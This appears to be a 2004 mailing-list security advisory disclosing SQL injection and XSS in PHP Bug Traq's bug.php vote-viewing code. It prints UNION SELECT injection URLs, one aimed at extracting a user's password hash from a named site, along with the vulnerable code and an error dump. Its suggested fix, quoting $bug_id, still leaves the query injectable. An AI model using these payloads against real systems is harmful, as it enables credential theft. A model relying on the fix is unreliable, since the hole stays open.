[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

SQL Injection in phpBT (bug.php)

 _   _                ______           _    
| | | |               |  _  \         | |   
| |_| | _____      __ | | | |__ _ _ __| | __
|  _  |/ _ \ \ /\ / / | | | / _` | '__| |/ /
| | | | (_) \ V  V /  | |/ / (_| | |  |   < 
\_| |_/\___/ \_/\_/   |___/ \__,_|_|  |_|\_\

// Information

Author: How Dark
Date:   November 13, 2004
URL:    http://www.howdark.com

Affected Software:              PHP Bug Traq
Software Version:               0.9.1
Software URL:           http://phpbt.sourceforge.net/

Attack:                 SQL Injection, allowing people to minipulate the query 
into pulling data
                        they should not previously be able too obtain. (Such as 

                        XSS, cross site scripting leaving cookie data to 

Description:            bug_id variable is left open. xss on display of id.



// Description

For viewing the votes placed on a bug, the bug_id variable is left open.



// URL

bug.php?op=viewvotes&bugid=1 union select 1,2,3/*
bug.php?op=viewvotes&bugid=1 union select 1,2,3/*%20 XSS here
http://www.phpbb.com/bugs/bug.php?op=viewvotes&bugid=1 union select 
1,user_password,3 where user_id='2'/*



// Code
[ Line 29  -  37 ]

        function vote_view($bug_id) {
                global $u, $db, $t, $STRING;

                $t->assign('votes', $db->getAll('select login, v.created_date '.
                        'from '.TBL_AUTH_USER.' u, '.TBL_BUG_VOTE." v ".
                        "where u.user_id = v.user_id and bug_id = $bug_id ".
                        'order by v.created_date'));
                $t->wrap('bugvotes.html', 'bugvotes');

// Code


// SQL Error

DB Error: syntax error
SELECT u.user_id, username as login, v.created_date FROM phpbb_users u, 
phpbt_bug_vote v WHERE u.user_id = v.user_id AND bug_id = 2864' ORDER BY 
v.created_date [nativecode=1064 ** You have an error in your SQL syntax. Check 
the manual that corresponds to your MySQL server version for the right syntax 
to use near '' ORDER BY v.created_date' at line 1]



// Fix

Find:   [ Line 34 ]     "where u.user_id = v.user_id and bug_id = $bug_id ".
Replace:        [ Line 34 ]     "where u.user_id = v.user_id and bug_id = 
'$bug_id' ".


